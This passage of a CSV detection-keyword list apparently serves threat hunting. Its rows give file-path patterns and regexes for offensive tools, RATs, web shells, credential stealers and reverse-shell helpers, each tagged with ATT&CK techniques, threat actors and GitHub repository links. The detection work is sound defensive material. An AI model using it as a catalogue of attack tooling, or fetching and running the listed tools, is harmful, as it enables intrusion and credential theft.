RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","14006" "*\AppData\Local\Temp\*\RDP\Result\Pass3.txt*",".{0,1000}\\AppData\\Local\\Temp\\.{0,1000}\\RDP\\Result\\Pass3\.txt.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential 
Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","14007" "*\AppData\Local\Temp\Camera.ps1*",".{0,1000}\\AppData\\Local\\Temp\\Camera\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14015" "*\AppData\Local\Temp\factura.exe*",".{0,1000}\\AppData\\Local\\Temp\\factura\.exe.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","14021" "*\AppData\Local\Temp\GetLogs.ps1*",".{0,1000}\\AppData\\Local\\Temp\\GetLogs\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - 
TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14023" "*\AppData\Local\Temp\KPortScan*",".{0,1000}\\AppData\\Local\\Temp\\KPortScan.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","Dispossessor","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","0","N/A","N/A","8","1","2","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z","14029" "*\AppData\Local\Temp\Leaked.txt*",".{0,1000}\\AppData\\Local\\Temp\\Leaked\.txt.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14032" "*\AppData\Local\Temp\Payload.ps1*",".{0,1000}\\AppData\\Local\\Temp\\Payload\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","https://github.com/r00t-3xp10it/redpill","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14037" "*\AppData\Local\Temp\Screenshot.ps1*",".{0,1000}\\AppData\\Local\\Temp\\Screenshot\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14048" "*\AppData\Local\Temp\SSIDump.zip*",".{0,1000}\\AppData\\Local\\Temp\\SSIDump\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14049" "*\AppData\Local\Temp\Start-WebServer..ps1*",".{0,1000}\\AppData\\Local\\Temp\\Start\-WebServer\.\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 
- T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14050" "*\AppData\Local\Temp\StartWebServer.ps1*",".{0,1000}\\AppData\\Local\\Temp\\StartWebServer\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14051" "*\AppData\Local\Temp\tempfile.zip*",".{0,1000}\\AppData\\Local\\Temp\\tempfile\.zip.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source informations stealer in rust","T1003 - T1083 - T1114 - T1074","TA0006 - TA0009 - TA0005","N/A","N/A","Credential Access","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","14053" "*\AppData\Local\Temp\tor --*",".{0,1000}\\AppData\\Local\\Temp\\tor\s\-\-.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","14054" "*\AppData\Local\Temp\Upload.ps1*",".{0,1000}\\AppData\\Local\\Temp\\Upload\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14056" "*\AppData\Local\Temp\webserver.ps1*",".{0,1000}\\AppData\\Local\\Temp\\webserver\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14062" "*\AppData\Roaming\Kematian*",".{0,1000}\\AppData\\Roaming\\Kematian.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - 
T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","14079" "*\AppProxyC2.*",".{0,1000}\\AppProxyC2\..{0,1000}","offensive_tool_keyword","AppProxyC2","simple POC to show how to tunnel traffic through Azure Application Proxy","T1090 - T1572 - T1071","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/xpn/AppProxyC2","1","0","N/A","N/A","9","10","69","18","2021-04-21T13:02:15Z","2021-04-21T10:46:16Z","14099" "*\Aqua Server Editor.exe*",".{0,1000}\\Aqua\sServer\sEditor\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14100" "*\AquaServer.exe*",".{0,1000}\\AquaServer\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14101" "*\Aquates Rat.exe*",".{0,1000}\\Aquates\sRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14102" "*\arabicspy.php*",".{0,1000}\\arabicspy\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14103" "*\ArgFuscator.zip*",".{0,1000}\\ArgFuscator\.zip.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","14104" "*\args_spoofing-rs.exe*",".{0,1000}\\args_spoofing\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","14105" "*\arsenal-1.1.0.zip*",".{0,1000}\\arsenal\-1\.1\.0\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","14106" "*\arsenal-1.2.0.zip*",".{0,1000}\\arsenal\-1\.2\.0\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for 
hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","14107" "*\arsenal-1.2.1.zip*",".{0,1000}\\arsenal\-1\.2\.1\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","14108" "*\arsenal-master.zip*",".{0,1000}\\arsenal\-master\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","14109" "*\Ask4Creds.ps1*",".{0,1000}\\Ask4Creds\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","14110" "*\Ask4Creds.ps1*",".{0,1000}\\Ask4Creds\.ps1.{0,1000}","offensive_tool_keyword","Ask4Creds","Prompt User for credentials","T1056 - T1071","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Leo4j/Ask4Creds","1","0","N/A","N/A","8","1","1","0","2024-03-20T17:09:21Z","2023-11-12T15:21:40Z","14111" "*\asleap.exe*",".{0,1000}\\asleap\.exe.{0,1000}","offensive_tool_keyword","asleap","Exploiting a serious deficiency in proprietary Cisco LEAP networks","T1078 - T1557 - T1040","TA0006 - 
TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/joswr1ght/asleap","1","0","N/A","N/A","10","1","88","20","2021-06-21T00:13:17Z","2016-08-30T13:00:21Z","14112" "*\asm\x64\alter_pe_sections*",".{0,1000}\\asm\\x64\\alter_pe_sections.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","14113" "*\asm\x86\alter_pe_sections*",".{0,1000}\\asm\\x86\\alter_pe_sections.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","14114" "*\asm_CelestialSpark.x64.o*",".{0,1000}\\asm_CelestialSpark\.x64\.o.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","N/A","10","10","103","10","2025-03-27T12:47:34Z","2024-04-11T12:17:22Z","14115" "*\AsmHell.asm*",".{0,1000}\\AsmHell\.asm.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","N/A","8","6","535","71","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z","14116" "*\ASP.NET Web 
BackDoor.aspx*",".{0,1000}\\ASP\.NET\sWeb\sBackDoor\.aspx.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14117" "*\ASPJinjaObfuscator*",".{0,1000}\\ASPJinjaObfuscator.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","0","N/A","N/A","8","2","160","21","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z","14118" "*\ASPXspy2.aspx*",".{0,1000}\\ASPXspy2\.aspx.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14119" "*\AspxSpy2014Final.aspx*",".{0,1000}\\AspxSpy2014Final\.aspx.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14120" "*\asreproasting.c*",".{0,1000}\\asreproasting\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 
- T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","14121" "*\AsStrongAsFuck.exe*",".{0,1000}\\AsStrongAsFuck\.exe.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","14124" "*\asstrongasfuck.py*",".{0,1000}\\asstrongasfuck\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource 
Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","14125" "*\AsyncRAT\*",".{0,1000}\\AsyncRAT\\.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","TA2541 - APT-C-36 - Earth Berberoka - Operation Comando - TA558","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","N/A","N/A","10","10","2484","754","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z","14126" "*\ataDmargorP\:C*",".{0,1000}\\ataDmargorP\\\:C.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed strings","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","14127" "*\atexec.py*",".{0,1000}\\atexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","14129" "*\atexec-pro.py*",".{0,1000}\\atexec\-pro\.py.{0,1000}","offensive_tool_keyword","atexec-pro","Fileless atexec for lateral movement","T1021.002 - T1105","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Ridter/atexec-pro","1","0","N/A","N/A","10","4","366","45","2024-03-28T03:36:50Z","2024-03-27T09:15:00Z","14130" "*\atexec-pro-main*",".{0,1000}\\atexec\-pro\-main.{0,1000}","offensive_tool_keyword","atexec-pro","Fileless atexec for lateral movement","T1021.002 - T1105","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Ridter/atexec-pro","1","0","N/A","N/A","10","4","366","45","2024-03-28T03:36:50Z","2024-03-27T09:15:00Z","14131" "*\Athena-*.zip*",".{0,1000}\\Athena\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","0","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","14132" "*\AtomLdr\x64*",".{0,1000}\\AtomLdr\\x64.{0,1000}","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/NUL0x4C/AtomLdr","1","0","N/A","N/A","N/A","8","712","91","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z","14136" "*\atomsilo.hta*",".{0,1000}\\atomsilo\.hta.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14137" "*\ATPMiniDump.exe*",".{0,1000}\\ATPMiniDump\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14138" 
